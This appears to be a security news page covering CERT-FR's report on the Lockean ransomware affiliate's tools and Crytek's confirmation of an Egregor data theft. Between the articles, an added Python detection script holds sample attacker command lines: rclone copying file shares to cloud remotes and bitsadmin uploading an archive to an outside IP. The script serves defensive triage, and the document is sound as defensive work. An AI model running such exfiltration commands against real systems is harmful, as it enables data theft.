
Lockean Multi-ransomware Hitting French Companies--CERT-FR


Analysts at France's national Computer Emergency Response Team (CERT-FR, operated by ANSSI) have published details of the tools and tactics of a ransomware affiliate group they track as Lockean. Over the past two years the group has continuously targeted French companies, and at least eight of them have reportedly suffered large-scale data breaches. The group steals data and then deploys payloads from several ransomware-as-a-service (RaaS) operations.

According to the report, the victims include the transport and logistics firm Gefco, the newspaper Ouest-France and the pharmaceutical groups Fareva and Pierre Fabre, among others.

“Based on incidents reported to the ANSSI and their commonalities, investigations were carried out by the Agency to confirm the existence of a single cybercriminal group responsible for these incidents, understand its modus operandi and distinguish its techniques, tactics, and procedures (TTPs) …

… First observed in June 2020, this group named Lockean is thought to have affiliated with several Ransomware-as-a-Service (RaaS) including DoppelPaymer, Maze, Prolock, Egregor, and Sodinokibi. Lockean has a propensity to target French entities under a Big Game Hunting rationale,” reads the report published by CERT-FR.

Lockean was first observed in 2020, when the group compromised a French manufacturing company and deployed DoppelPaymer ransomware on its network. Between June 2020 and March 2021, Lockean compromised at least seven more companies' networks, deploying ransomware from several families including Maze, Egregor, REvil (Sodinokibi), and ProLock.

In most of the attacks, the group gained initial access to the victim network through the Qbot/QakBot malware and then used the post-exploitation framework Cobalt Strike to move through it. Qbot/QakBot started out as a banking trojan and has since been repurposed as a loader that delivers other malware onto compromised systems, including the ProLock, DoppelPaymer, and Egregor ransomware strains, CERT-FR said.

To deliver QakBot by phishing email, the group used the Emotet distribution service in 2020 and the TA551 distribution service in 2020 and 2021. Once inside a network, the group relied on AdFind and BloodHound for Active Directory reconnaissance, and on BITSAdmin and RClone to exfiltrate data.
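As an added example (not part of the CERT-FR report or of this post), the following Python script runs command-line detections for the tools named above over a handful of constructed, Sysmon-style process-creation events. The sample events, the regexes, and the choice of SharpHound as the BloodHound collector binary are assumptions made for illustration; matching on the command line as well as the image name is what catches a renamed binary.

```python
"""Process-creation triage for the Lockean tooling named in the CERT-FR write-up.

Added example: not CERT-FR's or this post's own detection content.
Events are constructed, Sysmon Event ID 1 style records, simplified to the
fields the rules need. Rules match on the image basename OR the command
line, so a renamed binary (e.g. rclone copied to sync.exe) is still caught.
"""
import re
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Rule:
    name: str
    phase: str      # intrusion phase the tool is used for
    image: str      # regex on the lower-cased process image basename
    cmdline: str    # regex on the full command line (case-insensitive)


RULES = [
    # AdFind LDAP queries: -f <filter> or -sc <shortcut> are its hallmark switches
    Rule("adfind_ad_enum", "discovery",
         r"^adfind\.exe$",
         r"(?:\s-f\s+\(?objectc(?:ategory|lass)=|\s-sc\s+\w+)"),
    # Assumption: BloodHound data is gathered with the SharpHound collector
    Rule("bloodhound_collector", "discovery",
         r"^sharphound(?:\.exe)?$",
         r"(?:--collectionmethod|\s-c\s+all\b)"),
    # BITS upload jobs; plain /transfer downloads also deserve triage
    Rule("bitsadmin_upload", "exfiltration",
         r"^bitsadmin\.exe$",
         r"/transfer\b.*(?:/upload\b|https?://)"),
    # rclone "<verb> <local path> <remote>:<path>" form
    Rule("rclone_cloud_copy", "exfiltration",
         r"^rclone\.exe$",
         r"\b(?:copy|sync|move)\s+\S+\s+[A-Za-z0-9_-]+:"),
]

# Constructed sample events (hosts, users, paths and IPs are illustrative only)
SAMPLE_EVENTS = [
    {"host": "dc01", "user": r"CORP\svc_backup",
     "image": r"C:\Windows\Temp\AdFind.exe",
     "cmdline": "AdFind.exe -f objectcategory=computer -csv name operatingSystem"},
    {"host": "ws01", "user": r"CORP\jdoe",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\SharpHound.exe",
     "cmdline": "SharpHound.exe -c All --zipfilename corp.zip"},
    {"host": "fs01", "user": r"CORP\svc_backup",
     "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r"rclone.exe copy \\fs01\finance mega:lk-dump --transfers 10 -q"},
    {"host": "fs01", "user": r"CORP\svc_backup",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer lk /upload /priority high http://198.51.100.7/up/q3.7z C:\ProgramData\q3.7z"},
    # rclone renamed to sync.exe: only the command-line pattern will fire
    {"host": "ws02", "user": r"CORP\bob",
     "image": r"C:\Users\bob\Downloads\sync.exe",
     "cmdline": r"sync.exe copy C:\Users\bob\Documents\HR pcloud:hr --transfers 8"},
    # benign noise that must not match
    {"host": "ws02", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"host": "fs01", "user": r"CORP\svc_backup",
     "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy.exe C:\data \\bk01\backup /MIR"},
]


def detect(events: Iterable[dict]) -> list[dict]:
    """Return one alert per (event, rule) match, in event order."""
    alerts = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev["cmdline"]
        for rule in RULES:
            by_image = re.search(rule.image, image, re.I) is not None
            by_cmd = re.search(rule.cmdline, cmd, re.I) is not None
            if by_image or by_cmd:
                alerts.append({
                    "host": ev["host"], "user": ev["user"],
                    "rule": rule.name, "phase": rule.phase,
                    "renamed_binary": by_cmd and not by_image,
                    "cmdline": cmd,
                })
    return alerts


def phases_by_host(alerts: Iterable[dict]) -> dict[str, list[str]]:
    """Map each host to the sorted, de-duplicated intrusion phases seen on it."""
    seen: dict[str, set[str]] = {}
    for a in alerts:
        seen.setdefault(a["host"], set()).add(a["phase"])
    return {h: sorted(p) for h, p in seen.items()}


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        flag = " (renamed binary)" if a["renamed_binary"] else ""
        print(f'{a["host"]:5} {a["phase"]:12} {a["rule"]}{flag}: {a["cmdline"]}')
    print(phases_by_host(detect(SAMPLE_EVENTS)))
```

A host that shows discovery followed by exfiltration from the same service account, as fs01 and dc01 do here under svc_backup, is the pattern worth escalating; the command-line rules are deliberately narrow, so tune them against your own baseline of legitimate rclone, robocopy and BITS usage before deploying.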

Crytek Confirms Data Theft After Egregor Ransomware Attack


German game developer and publisher Crytek has confirmed that the Egregor ransomware gang breached its systems, encrypted them and stole data, including customers' personal details, which the gang later published on its dark web leak site.

Earlier this month, Crytek sent breach notification letters to the individuals affected by the attack, acknowledging the ransomware incident that took place in October 2020. One of the affected customers shared the letter with BleepingComputer.

"We want to inform you that Crytek was the victim of a ransomware attack by some unknown cyber-criminals. Ransomware is a form of malware that encrypts files on the systems of the attacked company. During that attack certain data had been encrypted and stolen from our network. We took immediate action to prevent the encryption of our systems, further secure our environment, and initiate an internal and external investigation into the incident," Crytek wrote in the letter mailed to one of the customers affected by the breach.

The company tried to reassure affected individuals by stating that "the website itself was difficult to identify, so that in our estimation, only very few people will have taken note of it." It also wrote that, given the size of the leaked data, downloading it would have taken too long, which it considered a significant obstacle for anyone who wanted to obtain it.

Crytek further believes that anyone who did attempt to download the leaked data would have been discouraged by the "huge risk" of infecting their systems with malware embedded in the leaked documents.

Crytek's attempts to downplay the breach do not hold up: anyone who actually wanted the leaked data would fetch it with a download tool and open it inside an isolated virtual machine. The data Egregor published on its leak site included files related to Warface, the cancelled MOBA Arena of Fate, and documents describing Crytek's network operations.

Egregor has so far hit many well-known companies and organizations around the world, including Barnes and Noble, Kmart, Cencosud, Randstad, and Vancouver's TransLink transit system. In February, several members of the Egregor operation were arrested in Ukraine in a joint operation between French and Ukrainian authorities, after French law enforcement traced ransom payments to individuals living in Ukraine.